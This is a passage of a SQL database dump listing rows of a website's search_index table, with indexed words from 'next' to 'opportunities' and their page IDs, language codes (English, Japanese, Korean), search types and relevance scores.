('next', 69, 'ko', 'help_search', 1),
('next', 74, 'en', 'help_search', 2),
('next', 74, 'ja', 'help_search', 2),
('next', 74, 'ko', 'help_search', 2),
('next', 75, 'en', 'help_search', 1),
('next', 75, 'ja', 'help_search', 1),
('next', 75, 'ko', 'help_search', 1),
('next', 81, 'en', 'help_search', 5),
('next', 81, 'ja', 'help_search', 5),
('next', 81, 'ko', 'help_search', 5),
('next', 87, 'en', 'help_search', 1),
('next', 87, 'ja', 'help_search', 1),
('next', 87, 'ko', 'help_search', 1),
('next', 88, 'en', 'help_search', 1),
('next', 88, 'ja', 'help_search', 1),
('next', 88, 'ko', 'help_search', 1),
('next', 91, 'en', 'help_search', 1),
('next', 91, 'ja', 'help_search', 1),
('next', 91, 'ko', 'help_search', 1),
('next', 92, 'en', 'help_search', 1),
('next', 92, 'ja', 'help_search', 1),
('next', 92, 'ko', 'help_search', 1),
('next', 178, 'en', 'node_search', 1),
('next', 185, 'en', 'node_search', 28),
('next', 186, 'en', 'node_search', 1),
('next', 190, 'en', 'node_search', 1),
('next', 191, 'en', 'node_search', 1),
('next', 193, 'en', 'node_search', 1),
('next', 195, 'en', 'node_search', 1),
('next', 197, 'en', 'node_search', 1),
('next', 198, 'en', 'node_search', 1),
('next', 199, 'en', 'node_search', 1),
('night', 87, 'en', 'node_search', 1),
('nihongo', 62, 'en', 'node_search', 2.71904),
('niigata', 62, 'en', 'node_search', 1),
('nila', 129, 'en', 'node_search', 28),
('nila', 129, 'ja', 'node_search', 28),
('nilar', 88, 'en', 'node_search', 2),
('nilar', 88, 'ja', 'node_search', 2),
('nilar', 154, 'en', 'node_search', 1),
('nilar', 154, 'ja', 'node_search', 1),
('nine', 157, 'en', 'node_search', 2),
('nine', 173, 'en', 'node_search', 31),
('node', 7, 'en', 'help_search', 2),
('node', 7, 'ja', 'help_search', 2),
('node', 7, 'ko', 'help_search', 2),
('node', 10, 'en', 'help_search', 1),
('node', 10, 'ja', 'help_search', 1),
('node', 10, 'ko', 'help_search', 1),
('node', 56, 'en', 'help_search', 4),
('node', 56, 'ja', 'help_search', 4),
('node', 56, 'ko', 'help_search', 4),
('node', 62, 'en', 'help_search', 1),
('node', 62, 'ja', 'help_search', 1),
('node', 62, 'ko', 'help_search', 1),
('node', 65, 'en', 'help_search', 13),
('node', 65, 'ja', 'help_search', 13),
('node', 65, 'ko', 'help_search', 13),
('node', 68, 'en', 'help_search', 2),
('node', 68, 'ja', 'help_search', 2),
('node', 68, 'ko', 'help_search', 2),
('noe', 173, 'en', 'node_search', 1),
('noe', 173, 'ja', 'node_search', 1),
('nolink', 56, 'en', 'help_search', 4),
('nolink', 56, 'ja', 'help_search', 4),
('nolink', 56, 'ko', 'help_search', 4),
('nomenclature', 133, 'en', 'node_search', 1),
('nonadministration', 77, 'en', 'help_search', 1),
('nonadministration', 77, 'ja', 'help_search', 1),
('nonadministration', 77, 'ko', 'help_search', 1),
('nonadministrative', 22, 'en', 'help_search', 2),
('nonadministrative', 22, 'ja', 'help_search', 2),
('nonadministrative', 22, 'ko', 'help_search', 2),
('nonadministrative', 43, 'en', 'help_search', 1),
('nonadministrative', 43, 'ja', 'help_search', 1),
('nonadministrative', 43, 'ko', 'help_search', 1),
('nonadministrative', 59, 'en', 'help_search', 1),
('nonadministrative', 59, 'ja', 'help_search', 1),
('nonadministrative', 59, 'ko', 'help_search', 1),
('noncacheable', 37, 'en', 'help_search', 0.961087),
('noncacheable', 37, 'ja', 'help_search', 0.961087),
('noncacheable', 37, 'ko', 'help_search', 0.961087),
('nondefault', 42, 'en', 'help_search', 1),
('nondefault', 42, 'ja', 'help_search', 1),
('nondefault', 42, 'ko', 'help_search', 1),
('none', 72, 'en', 'help_search', 3.69535),
('none', 72, 'ja', 'help_search', 3.69535),
('none', 72, 'ko', 'help_search', 3.69535),
('nonenglish', 46, 'en', 'help_search', 1),
('nonenglish', 46, 'ja', 'help_search', 1),
('nonenglish', 46, 'ko', 'help_search', 1),
('nonenglish', 52, 'en', 'help_search', 2),
('nonenglish', 52, 'ja', 'help_search', 2),
('nonenglish', 52, 'ko', 'help_search', 2),
('nonerror', 72, 'en', 'help_search', 1),
('nonerror', 72, 'ja', 'help_search', 1),
('nonerror', 72, 'ko', 'help_search', 1),
('nontoplevel', 46, 'en', 'help_search', 1),
('nontoplevel', 46, 'ja', 'help_search', 1),
('nontoplevel', 46, 'ko', 'help_search', 1),
('normal', 72, 'en', 'help_search', 1),
('normal', 72, 'ja', 'help_search', 1),
('normal', 72, 'ko', 'help_search', 1),
('normal', 73, 'en', 'help_search', 2),
('normal', 73, 'ja', 'help_search', 2),
('normal', 73, 'ko', 'help_search', 2),
('normally', 27, 'en', 'help_search', 1),
('normally', 27, 'ja', 'help_search', 1),
('normally', 27, 'ko', 'help_search', 1),
('normally', 80, 'en', 'help_search', 2),
('normally', 80, 'ja', 'help_search', 2),
('normally', 80, 'ko', 'help_search', 2),
('not', 2, 'en', 'help_search', 1),
('not', 2, 'ja', 'help_search', 1),
('not', 2, 'ko', 'help_search', 1),
('not', 3, 'en', 'node_search', 1),
('not', 3, 'ko', 'node_search', 1),
('not', 7, 'en', 'help_search', 2.98902),
('not', 7, 'ja', 'help_search', 2.98902),
('not', 7, 'ko', 'help_search', 2.98902),
('not', 10, 'en', 'help_search', 1),
('not', 10, 'ja', 'help_search', 1),
('not', 10, 'ko', 'help_search', 1),
('not', 24, 'en', 'node_search', 1),
('not', 25, 'en', 'help_search', 2),
('not', 25, 'ja', 'help_search', 2),
('not', 26, 'en', 'help_search', 1),
('not', 26, 'ja', 'help_search', 1),
('not', 26, 'ko', 'help_search', 1),
('not', 27, 'en', 'help_search', 2),
('not', 27, 'ja', 'help_search', 2),
('not', 27, 'ko', 'help_search', 2),
('not', 28, 'en', 'help_search', 0.957226),
('not', 28, 'ja', 'help_search', 0.957226),
('not', 28, 'ko', 'help_search', 0.957226),
('not', 29, 'en', 'help_search', 1),
('not', 29, 'ja', 'help_search', 1),
('not', 29, 'ko', 'help_search', 1),
('not', 30, 'en', 'help_search', 1.85498),
('not', 30, 'ja', 'help_search', 1.85498),
('not', 30, 'ko', 'help_search', 1.85498),
('not', 31, 'en', 'node_search', 1),
('not', 31, 'ja', 'help_search', 2.72283),
('not', 32, 'en', 'help_search', 1.99731),
('not', 32, 'ja', 'help_search', 1.99731),
('not', 32, 'ko', 'help_search', 1.99731),
('not', 33, 'en', 'help_search', 2),
('not', 33, 'ja', 'help_search', 2),
('not', 33, 'ko', 'help_search', 2),
('not', 34, 'en', 'help_search', 1),
('not', 34, 'ja', 'help_search', 1),
('not', 34, 'ko', 'help_search', 1),
('not', 37, 'en', 'help_search', 1.98902),
('not', 37, 'ja', 'help_search', 1.98902),
('not', 37, 'ko', 'help_search', 1.98902),
('not', 42, 'en', 'help_search', 1),
('not', 42, 'ja', 'help_search', 1),
('not', 42, 'ko', 'help_search', 1),
('not', 43, 'en', 'help_search', 1),
('not', 43, 'ja', 'help_search', 1),
('not', 43, 'ko', 'help_search', 1),
('not', 45, 'en', 'help_search', 4),
('not', 45, 'ja', 'help_search', 4),
('not', 45, 'ko', 'help_search', 4),
('not', 49, 'en', 'help_search', 1),
('not', 49, 'ja', 'help_search', 1),
('not', 49, 'ko', 'help_search', 1),
('not', 50, 'en', 'help_search', 1.9534),
('not', 50, 'ja', 'help_search', 1.9534),
('not', 50, 'ko', 'help_search', 1.9534),
('not', 54, 'en', 'help_search', 1),
('not', 54, 'ja', 'help_search', 1),
('not', 54, 'ko', 'help_search', 1),
('not', 56, 'en', 'help_search', 3),
('not', 56, 'ja', 'help_search', 3),
('not', 56, 'ko', 'help_search', 3),
('not', 59, 'en', 'help_search', 1),
('not', 59, 'ja', 'help_search', 1),
('not', 59, 'ko', 'help_search', 1),
('not', 60, 'en', 'help_search', 1),
('not', 60, 'ja', 'help_search', 1),
('not', 60, 'ko', 'help_search', 1),
('not', 62, 'en', 'node_search', 1),
('not', 66, 'en', 'help_search', 2),
('not', 66, 'ja', 'help_search', 2),
('not', 68, 'en', 'help_search', 2),
('not', 68, 'ja', 'help_search', 2),
('not', 68, 'ko', 'help_search', 2),
('not', 71, 'en', 'help_search', 1),
('not', 71, 'ja', 'help_search', 1),
('not', 71, 'ko', 'help_search', 1),
('not', 72, 'en', 'help_search', 2),
('not', 72, 'ja', 'help_search', 2),
('not', 72, 'ko', 'help_search', 2),
('not', 74, 'en', 'help_search', 1),
('not', 74, 'ja', 'help_search', 1),
('not', 74, 'ko', 'help_search', 1),
('not', 77, 'en', 'help_search', 1),
('not', 77, 'ja', 'help_search', 1),
('not', 77, 'ko', 'help_search', 1),
('not', 78, 'en', 'help_search', 1),
('not', 78, 'ja', 'help_search', 1),
('not', 78, 'ko', 'help_search', 1),
('not', 84, 'en', 'help_search', 1),
('not', 84, 'ja', 'help_search', 1),
('not', 84, 'ko', 'help_search', 1),
('not', 85, 'en', 'help_search', 1),
('not', 85, 'ja', 'help_search', 1),
('not', 85, 'ko', 'help_search', 1),
('not', 87, 'en', 'help_search', 1),
('not', 87, 'ja', 'help_search', 1),
('not', 87, 'ko', 'help_search', 1),
('not', 88, 'en', 'help_search', 1),
('not', 88, 'ja', 'help_search', 1),
('not', 88, 'ko', 'help_search', 1),
('not', 89, 'en', 'help_search', 2),
('not', 89, 'ja', 'help_search', 2),
('not', 89, 'ko', 'help_search', 2),
('not', 91, 'en', 'help_search', 1),
('not', 91, 'ja', 'help_search', 1),
('not', 91, 'ko', 'help_search', 1),
('not', 92, 'en', 'help_search', 2),
('not', 92, 'ja', 'help_search', 2),
('not', 92, 'ko', 'help_search', 2),
('not', 98, 'en', 'node_search', 1),
('not', 136, 'en', 'node_search', 1),
('not', 138, 'en', 'node_search', 1),
('not', 179, 'en', 'node_search', 1),
('not', 182, 'en', 'node_search', 1),
('not', 190, 'en', 'node_search', 1),
('not', 199, 'en', 'node_search', 1),
('not', 204, 'en', 'node_search', 4),
('not', 204, 'ja', 'node_search', 4),
('note', 9, 'en', 'help_search', 1),
('note', 9, 'ja', 'help_search', 1),
('note', 9, 'ko', 'help_search', 1),
('note', 17, 'en', 'help_search', 1),
('note', 17, 'ja', 'help_search', 1),
('note', 17, 'ko', 'help_search', 1),
('note', 31, 'en', 'node_search', 1),
('note', 32, 'en', 'help_search', 1),
('note', 32, 'ja', 'help_search', 1),
('note', 32, 'ko', 'help_search', 1),
('note', 54, 'en', 'help_search', 1),
('note', 54, 'ja', 'help_search', 1),
('note', 54, 'ko', 'help_search', 1),
('note', 56, 'en', 'help_search', 1),
('note', 56, 'ja', 'help_search', 1),
('note', 56, 'ko', 'help_search', 1),
('note', 64, 'en', 'help_search', 1),
('note', 64, 'ja', 'help_search', 1),
('note', 64, 'ko', 'help_search', 1),
('note', 72, 'en', 'help_search', 1),
('note', 72, 'ja', 'help_search', 1),
('note', 72, 'ko', 'help_search', 1),
('note', 76, 'en', 'help_search', 1),
('note', 76, 'ja', 'help_search', 1),
('note', 76, 'ko', 'help_search', 1),
('note', 89, 'en', 'help_search', 1),
('note', 89, 'ja', 'help_search', 1),
('note', 89, 'ko', 'help_search', 1),
('noted', 54, 'en', 'help_search', 1),
('noted', 54, 'ja', 'help_search', 1),
('noted', 54, 'ko', 'help_search', 1),
('notfound', 72, 'en', 'help_search', 7.78302),
('notfound', 72, 'ja', 'help_search', 7.78302),
('notfound', 72, 'ko', 'help_search', 7.78302),
('notice', 7, 'en', 'help_search', 1),
('notice', 7, 'ja', 'help_search', 1),
('notice', 7, 'ko', 'help_search', 1),
('notify', 82, 'en', 'help_search', 4),
('notify', 82, 'ja', 'help_search', 4),
('notify', 82, 'ko', 'help_search', 4),
('notifying', 82, 'en', 'help_search', 1),
('notifying', 82, 'ja', 'help_search', 1),
('notifying', 82, 'ko', 'help_search', 1),
('now', 24, 'en', 'help_search', 1),
('now', 24, 'ja', 'help_search', 1),
('now', 24, 'ko', 'help_search', 1),
('now', 27, 'en', 'help_search', 1),
('now', 27, 'ja', 'help_search', 1),
('now', 27, 'ko', 'help_search', 1),
('now', 30, 'en', 'help_search', 0.792123),
('now', 30, 'ja', 'help_search', 0.792123),
('now', 30, 'ko', 'help_search', 0.792123),
('now', 32, 'en', 'help_search', 1),
('now', 32, 'ja', 'help_search', 1),
('now', 32, 'ko', 'help_search', 1),
('now', 48, 'en', 'help_search', 1),
('now', 48, 'ja', 'help_search', 1),
('now', 48, 'ko', 'help_search', 1),
('now', 54, 'en', 'help_search', 1),
('now', 54, 'ja', 'help_search', 1),
('now', 54, 'ko', 'help_search', 1),
('now', 66, 'en', 'node_search', 4),
('now', 77, 'en', 'help_search', 1),
('now', 77, 'ja', 'help_search', 1),
('now', 77, 'ko', 'help_search', 1),
('now', 155, 'en', 'node_search', 27),
('number', 7, 'en', 'help_search', 5),
('number', 7, 'ja', 'help_search', 5),
('number', 7, 'ko', 'help_search', 5),
('number', 23, 'en', 'node_search', 1),
('number', 24, 'en', 'help_search', 5),
('number', 24, 'ja', 'help_search', 5),
('number', 24, 'ko', 'help_search', 5),
('number', 27, 'en', 'help_search', 5),
('number', 27, 'en', 'node_search', 1.6302),
('number', 27, 'ja', 'help_search', 5),
('number', 27, 'ko', 'help_search', 5),
('number', 31, 'ja', 'help_search', 0.896076),
('number', 67, 'en', 'help_search', 6),
('number', 67, 'ja', 'help_search', 6),
('number', 67, 'ko', 'help_search', 6),
('number', 69, 'en', 'help_search', 1),
('number', 69, 'ja', 'help_search', 1),
('number', 69, 'ko', 'help_search', 1),
('numbers', 31, 'ja', 'help_search', 2.49176),
('numbers', 42, 'en', 'help_search', 1),
('numbers', 42, 'ja', 'help_search', 1),
('numbers', 42, 'ko', 'help_search', 1),
('numerical', 42, 'en', 'help_search', 1),
('numerical', 42, 'ja', 'help_search', 1),
('numerical', 42, 'ko', 'help_search', 1),
('nursing', 24, 'en', 'node_search', 0.997306),
('nursing', 136, 'en', 'node_search', 46),
('nursing', 136, 'ja', 'node_search', 27),
('nursing', 162, 'en', 'node_search', 1),
('nutrition', 162, 'en', 'node_search', 1),
('nway', 73, 'en', 'node_search', 1),
('nway', 73, 'ja', 'node_search', 1),
('nway', 97, 'en', 'node_search', 2),
('nway', 97, 'ja', 'node_search', 2),
('nway', 111, 'en', 'node_search', 2),
('nway', 111, 'ja', 'node_search', 2),
('nwe', 68, 'en', 'node_search', 4),
('nwe', 68, 'ja', 'node_search', 4),
('nwe', 105, 'en', 'node_search', 1),
('nwe', 105, 'ja', 'node_search', 1),
('nwe', 143, 'en', 'node_search', 28),
('nwe', 143, 'ja', 'node_search', 31),
('nwe', 157, 'en', 'node_search', 2),
('nwe', 157, 'ja', 'node_search', 2),
('nyein', 78, 'en', 'node_search', 2),
('nyein', 78, 'ja', 'node_search', 2),
('nyein', 94, 'en', 'node_search', 2),
('nyein', 96, 'en', 'node_search', 2),
('nyein', 96, 'ja', 'node_search', 2),
('nyein', 103, 'en', 'node_search', 2),
('nyein', 103, 'ja', 'node_search', 2),
('nyein', 108, 'en', 'node_search', 2),
('nyein', 108, 'ja', 'node_search', 2),
('nyein', 113, 'en', 'node_search', 2),
('nyein', 113, 'ja', 'node_search', 2),
('nyein', 134, 'en', 'node_search', 1),
('nyein', 134, 'ja', 'node_search', 1),
('nyein', 141, 'en', 'node_search', 28),
('nyein', 141, 'ja', 'node_search', 31),
('nyunt', 31, 'en', 'node_search', 0.830633),
('obtained', 23, 'en', 'node_search', 1),
('obtaining', 183, 'en', 'node_search', 1),
('occasionally', 38, 'en', 'help_search', 1),
('occasionally', 38, 'ja', 'help_search', 1),
('occasionally', 38, 'ko', 'help_search', 1),
('occur', 42, 'en', 'help_search', 1),
('occur', 42, 'ja', 'help_search', 1),
('occur', 42, 'ko', 'help_search', 1),
('occur', 72, 'en', 'help_search', 19),
('occur', 72, 'ja', 'help_search', 19),
('occur', 72, 'ko', 'help_search', 19),
('off', 8, 'en', 'node_search', 2),
('off', 9, 'en', 'help_search', 3),
('off', 9, 'ja', 'help_search', 3),
('off', 9, 'ko', 'help_search', 3),
('off', 33, 'en', 'help_search', 1),
('off', 33, 'ja', 'help_search', 1),
('off', 33, 'ko', 'help_search', 1),
('off', 140, 'en', 'node_search', 1),
('off', 162, 'en', 'node_search', 0.953396),
('off', 176, 'en', 'node_search', 27),
('offer', 1, 'en', 'node_search', 1),
('offer', 43, 'en', 'help_search', 1),
('offer', 43, 'ja', 'help_search', 1),
('offer', 43, 'ko', 'help_search', 1),
('offer', 138, 'en', 'node_search', 1),
('offers', 62, 'en', 'node_search', 1),
('offers', 162, 'en', 'node_search', 1),
('offers', 187, 'en', 'node_search', 1),
('office', 5, 'en', 'node_search', 1),
('office', 5, 'ko', 'node_search', 1),
('office', 7, 'en', 'node_search', 2),
('office', 7, 'ko', 'node_search', 4),
('office', 27, 'en', 'node_search', 0.976851);
INSERT INTO `search_index` (`word`, `sid`, `langcode`, `type`, `score`) VALUES
('often', 32, 'en', 'help_search', 1),
('often', 32, 'ja', 'help_search', 1),
('often', 32, 'ko', 'help_search', 1),
('often', 91, 'en', 'help_search', 1),
('often', 91, 'ja', 'help_search', 1),
('often', 91, 'ko', 'help_search', 1),
('old', 31, 'en', 'node_search', 0.931053),
('old', 62, 'en', 'node_search', 1.75018),
('old', 62, 'ja', 'node_search', 0.566439),
('older', 47, 'en', 'help_search', 1),
('older', 47, 'ja', 'help_search', 1),
('older', 47, 'ko', 'help_search', 1),
('once', 30, 'en', 'help_search', 0.957226),
('once', 30, 'ja', 'help_search', 0.957226),
('once', 30, 'ko', 'help_search', 0.957226),
('once', 32, 'en', 'help_search', 2),
('once', 32, 'ja', 'help_search', 2),
('once', 32, 'ko', 'help_search', 2),
('once', 46, 'en', 'help_search', 1),
('once', 46, 'ja', 'help_search', 1),
('once', 46, 'ko', 'help_search', 1),
('once', 86, 'en', 'help_search', 1),
('once', 86, 'ja', 'help_search', 1),
('once', 86, 'ko', 'help_search', 1),
('one', 2, 'en', 'help_search', 1),
('one', 2, 'ja', 'help_search', 1),
('one', 2, 'ko', 'help_search', 1),
('one', 3, 'en', 'node_search', 3),
('one', 3, 'ko', 'node_search', 3),
('one', 4, 'en', 'help_search', 1),
('one', 4, 'ja', 'help_search', 1),
('one', 4, 'ko', 'help_search', 1),
('one', 6, 'en', 'help_search', 3),
('one', 6, 'ja', 'help_search', 3),
('one', 6, 'ko', 'help_search', 3),
('one', 7, 'en', 'help_search', 1),
('one', 7, 'ja', 'help_search', 1),
('one', 7, 'ko', 'help_search', 1),
('one', 10, 'en', 'help_search', 2),
('one', 10, 'ja', 'help_search', 2),
('one', 10, 'ko', 'help_search', 2),
('one', 14, 'en', 'help_search', 1),
('one', 14, 'ja', 'help_search', 1),
('one', 14, 'ko', 'help_search', 1),
('one', 15, 'en', 'help_search', 1),
('one', 15, 'ja', 'help_search', 1),
('one', 15, 'ko', 'help_search', 1),
('one', 17, 'en', 'help_search', 1),
('one', 17, 'ja', 'help_search', 1),
('one', 17, 'ko', 'help_search', 1),
('one', 20, 'en', 'help_search', 1),
('one', 20, 'ja', 'help_search', 1),
('one', 20, 'ko', 'help_search', 1),
('one', 24, 'en', 'help_search', 1),
('one', 24, 'ja', 'help_search', 1),
('one', 24, 'ko', 'help_search', 1),
('one', 27, 'en', 'help_search', 2),
('one', 27, 'en', 'node_search', 0.860547),
('one', 27, 'ja', 'help_search', 2),
('one', 27, 'ko', 'help_search', 2),
('one', 29, 'en', 'help_search', 1),
('one', 29, 'ja', 'help_search', 1),
('one', 29, 'ko', 'help_search', 1),
('one', 30, 'en', 'help_search', 0.836446),
('one', 30, 'ja', 'help_search', 0.836446),
('one', 30, 'ko', 'help_search', 0.836446),
('one', 31, 'ja', 'help_search', 5.15836),
('one', 40, 'en', 'help_search', 1),
('one', 40, 'ja', 'help_search', 1),
('one', 40, 'ko', 'help_search', 1),
('one', 46, 'en', 'help_search', 1),
('one', 46, 'ja', 'help_search', 1),
('one', 46, 'ko', 'help_search', 1),
('one', 47, 'en', 'help_search', 2),
('one', 47, 'ja', 'help_search', 2),
('one', 47, 'ko', 'help_search', 2),
('one', 50, 'en', 'help_search', 1),
('one', 50, 'ja', 'help_search', 1),
('one', 50, 'ko', 'help_search', 1),
('one', 52, 'en', 'help_search', 1),
('one', 52, 'ja', 'help_search', 1),
('one', 52, 'ko', 'help_search', 1),
('one', 56, 'en', 'help_search', 1),
('one', 56, 'ja', 'help_search', 1),
('one', 56, 'ko', 'help_search', 1),
('one', 57, 'en', 'help_search', 1),
('one', 57, 'ja', 'help_search', 1),
('one', 57, 'ko', 'help_search', 1),
('one', 59, 'en', 'help_search', 1),
('one', 59, 'ja', 'help_search', 1),
('one', 59, 'ko', 'help_search', 1),
('one', 61, 'en', 'help_search', 1),
('one', 61, 'ja', 'help_search', 1),
('one', 61, 'ko', 'help_search', 1),
('one', 66, 'en', 'help_search', 1),
('one', 66, 'ja', 'help_search', 1),
('one', 68, 'en', 'help_search', 0.866793),
('one', 68, 'ja', 'help_search', 0.866793),
('one', 68, 'ko', 'help_search', 0.866793),
('one', 69, 'en', 'help_search', 3),
('one', 69, 'ja', 'help_search', 3),
('one', 69, 'ko', 'help_search', 3),
('one', 72, 'en', 'help_search', 0.916736),
('one', 72, 'ja', 'help_search', 0.916736),
('one', 72, 'ko', 'help_search', 0.916736),
('one', 74, 'en', 'help_search', 1),
('one', 74, 'ja', 'help_search', 1),
('one', 74, 'ko', 'help_search', 1),
('one', 80, 'en', 'help_search', 1),
('one', 80, 'ja', 'help_search', 1),
('one', 80, 'ko', 'help_search', 1),
('one', 81, 'en', 'help_search', 1),
('one', 81, 'ja', 'help_search', 1),
('one', 81, 'ko', 'help_search', 1),
('one', 84, 'en', 'help_search', 1),
('one', 84, 'ja', 'help_search', 1),
('one', 84, 'ko', 'help_search', 1),
('one', 89, 'en', 'help_search', 1),
('one', 89, 'ja', 'help_search', 1),
('one', 89, 'ko', 'help_search', 1),
('one', 92, 'en', 'help_search', 3),
('one', 92, 'ja', 'help_search', 3),
('one', 92, 'ko', 'help_search', 3),
('one', 93, 'en', 'help_search', 0.848323),
('one', 93, 'ja', 'help_search', 0.848323),
('one', 93, 'ko', 'help_search', 0.848323),
('one', 142, 'en', 'node_search', 1),
('one', 155, 'en', 'node_search', 1),
('one', 194, 'en', 'node_search', 1),
('one', 196, 'en', 'node_search', 1),
('one', 198, 'en', 'node_search', 1),
('onetimeloginurl', 86, 'en', 'help_search', 1),
('onetimeloginurl', 86, 'ja', 'help_search', 1),
('onetimeloginurl', 86, 'ko', 'help_search', 1),
('onjob', 95, 'en', 'node_search', 28),
('onjob', 95, 'ja', 'node_search', 27),
('online', 7, 'en', 'help_search', 9.74705),
('online', 7, 'ja', 'help_search', 9.74705),
('online', 7, 'ko', 'help_search', 9.74705),
('online', 10, 'en', 'help_search', 11),
('online', 10, 'ja', 'help_search', 11),
('online', 10, 'ko', 'help_search', 11),
('online', 37, 'en', 'help_search', 27.765),
('online', 37, 'ja', 'help_search', 27.765),
('online', 37, 'ko', 'help_search', 27.765),
('online', 44, 'en', 'help_search', 22),
('online', 44, 'ja', 'help_search', 22),
('online', 44, 'ko', 'help_search', 22),
('online', 68, 'en', 'help_search', 8.59953),
('online', 68, 'ja', 'help_search', 8.59953),
('online', 68, 'ko', 'help_search', 8.59953),
('only', 1, 'en', 'help_search', 1),
('only', 1, 'ja', 'help_search', 1),
('only', 1, 'ko', 'help_search', 1),
('only', 3, 'en', 'node_search', 1),
('only', 3, 'ko', 'node_search', 1),
('only', 7, 'en', 'help_search', 1),
('only', 7, 'ja', 'help_search', 1),
('only', 7, 'ko', 'help_search', 1),
('only', 11, 'en', 'help_search', 1),
('only', 11, 'ja', 'help_search', 1),
('only', 11, 'ko', 'help_search', 1),
('only', 23, 'en', 'help_search', 0.931053),
('only', 23, 'ja', 'help_search', 0.931053),
('only', 23, 'ko', 'help_search', 0.931053),
('only', 28, 'en', 'help_search', 0.876337),
('only', 28, 'ja', 'help_search', 0.876337),
('only', 28, 'ko', 'help_search', 0.876337),
('only', 30, 'en', 'help_search', 0.754681),
('only', 30, 'en', 'node_search', 2),
('only', 30, 'ja', 'help_search', 0.754681),
('only', 30, 'ko', 'help_search', 0.754681),
('only', 31, 'en', 'node_search', 0.976851),
('only', 41, 'en', 'help_search', 1),
('only', 41, 'ja', 'help_search', 1),
('only', 41, 'ko', 'help_search', 1),
('only', 45, 'en', 'help_search', 1),
('only', 45, 'ja', 'help_search', 1),
('only', 45, 'ko', 'help_search', 1),
('only', 53, 'en', 'help_search', 1),
('only', 53, 'ja', 'help_search', 1),
('only', 53, 'ko', 'help_search', 1),
('only', 62, 'en', 'node_search', 1),
('only', 68, 'en', 'help_search', 1),
('only', 68, 'ja', 'help_search', 1),
('only', 68, 'ko', 'help_search', 1),
('only', 69, 'en', 'help_search', 1),
('only', 69, 'ja', 'help_search', 1),
('only', 69, 'ko', 'help_search', 1),
('only', 76, 'en', 'help_search', 1),
('only', 76, 'ja', 'help_search', 1),
('only', 76, 'ko', 'help_search', 1),
('only', 80, 'en', 'help_search', 1),
('only', 80, 'ja', 'help_search', 1),
('only', 80, 'ko', 'help_search', 1),
('only', 85, 'en', 'help_search', 4),
('only', 85, 'ja', 'help_search', 4),
('only', 85, 'ko', 'help_search', 4),
('only', 86, 'en', 'help_search', 1),
('only', 86, 'ja', 'help_search', 1),
('only', 86, 'ko', 'help_search', 1),
('only', 92, 'en', 'help_search', 1),
('only', 92, 'ja', 'help_search', 1),
('only', 92, 'ko', 'help_search', 1),
('only', 136, 'en', 'node_search', 1),
('only', 138, 'en', 'node_search', 1),
('only', 179, 'en', 'node_search', 1),
('only', 182, 'en', 'node_search', 1),
('only', 190, 'en', 'node_search', 1),
('only', 199, 'en', 'node_search', 1),
('only', 204, 'en', 'node_search', 4),
('only', 204, 'ja', 'node_search', 4),
('open', 4, 'en', 'help_search', 1),
('open', 4, 'ja', 'help_search', 1),
('open', 4, 'ko', 'help_search', 1),
('open', 7, 'en', 'help_search', 4.61985),
('open', 7, 'ja', 'help_search', 4.61985),
('open', 7, 'ko', 'help_search', 4.61985),
('open', 9, 'en', 'help_search', 4),
('open', 9, 'ja', 'help_search', 4),
('open', 9, 'ko', 'help_search', 4),
('open', 39, 'en', 'help_search', 1),
('open', 39, 'ja', 'help_search', 1),
('open', 39, 'ko', 'help_search', 1),
('open', 62, 'en', 'node_search', 0.816452),
('open', 63, 'en', 'help_search', 1),
('open', 63, 'ja', 'help_search', 1),
('open', 63, 'ko', 'help_search', 1),
('open', 155, 'en', 'node_search', 32),
('opened', 24, 'en', 'node_search', 0.813674),
('opened', 31, 'en', 'node_search', 1),
('opening', 23, 'en', 'node_search', 0.78951),
('opening', 24, 'en', 'node_search', 1),
('opening', 155, 'en', 'node_search', 1),
('opens', 183, 'en', 'node_search', 27),
('opens', 192, 'en', 'node_search', 1),
('opens', 194, 'en', 'node_search', 27),
('opens', 197, 'en', 'node_search', 27),
('operating', 23, 'en', 'node_search', 1),
('operation', 27, 'en', 'node_search', 2.63167),
('operation', 73, 'en', 'help_search', 1),
('operation', 73, 'ja', 'help_search', 1),
('operation', 73, 'ko', 'help_search', 1),
('operation', 92, 'en', 'help_search', 1),
('operation', 92, 'ja', 'help_search', 1),
('operation', 92, 'ko', 'help_search', 1),
('operations', 16, 'en', 'help_search', 8),
('operations', 16, 'ja', 'help_search', 8),
('operations', 16, 'ko', 'help_search', 8),
('operations', 24, 'en', 'node_search', 0.934703),
('operations', 25, 'en', 'help_search', 4),
('operations', 25, 'ja', 'help_search', 4),
('operations', 26, 'en', 'help_search', 4),
('operations', 26, 'ja', 'help_search', 4),
('operations', 26, 'ko', 'help_search', 4),
('operations', 30, 'en', 'node_search', 1),
('operations', 32, 'en', 'help_search', 2),
('operations', 32, 'ja', 'help_search', 2),
('operations', 32, 'ko', 'help_search', 2),
('operations', 55, 'en', 'help_search', 4),
('operations', 55, 'ja', 'help_search', 4),
('operations', 55, 'ko', 'help_search', 4),
('operations', 56, 'en', 'help_search', 8),
('operations', 56, 'ja', 'help_search', 8),
('operations', 56, 'ko', 'help_search', 8),
('operations', 66, 'en', 'help_search', 4),
('operations', 66, 'ja', 'help_search', 4),
('operations', 73, 'en', 'help_search', 2),
('operations', 73, 'ja', 'help_search', 2),
('operations', 73, 'ko', 'help_search', 2),
('operations', 87, 'en', 'help_search', 4),
('operations', 87, 'ja', 'help_search', 4),
('operations', 87, 'ko', 'help_search', 4),
('operations', 89, 'en', 'help_search', 40.9822),
('operations', 89, 'ja', 'help_search', 40.974),
('operations', 89, 'ko', 'help_search', 40.9822),
('operations', 93, 'en', 'help_search', 17.2639),
('operations', 93, 'ja', 'help_search', 17.2639),
('operations', 93, 'ko', 'help_search', 17.2639),
('operationswe', 133, 'en', 'node_search', 1),
('opportunities', 1, 'en', 'node_search', 1),
('opportunities', 23, 'en', 'node_search', 2.8126),
('opportunities', 24, 'en', 'node_search', 2.87634),
('opportunities', 25, 'en', 'node_search', 1),
('opportunities', 26, 'en', 'node_search', 1),
('opportunities', 28, 'en', 'node_search', 1),
('opportunities', 66, 'en', 'node_search', 2),
('opportunities', 133, 'en', 'node_search', 1),
('opportunities', 154, 'en', 'node_search', 1),
('opportunities', 160, 'en', 'node_search', 1),
('opportunities', 161, 'en', 'node_search', 1),
('opportunities', 164, 'en', 'node_search', 2),
('opportunities', 165, 'en', 'node_search', 1),
('opportunities', 167, 'en', 'node_search', 2),
('opportunities', 173, 'en', 'node_search', 1),
('opportunities', 174, 'en', 'node_search', 1),
('opportunities', 175, 'en', 'node_search', 1),
('opportunities', 176, 'en', 'node_search', 1),
('opportunities', 177, 'en', 'node_search', 1),
('opportunities', 179, 'en', 'node_search', 1),
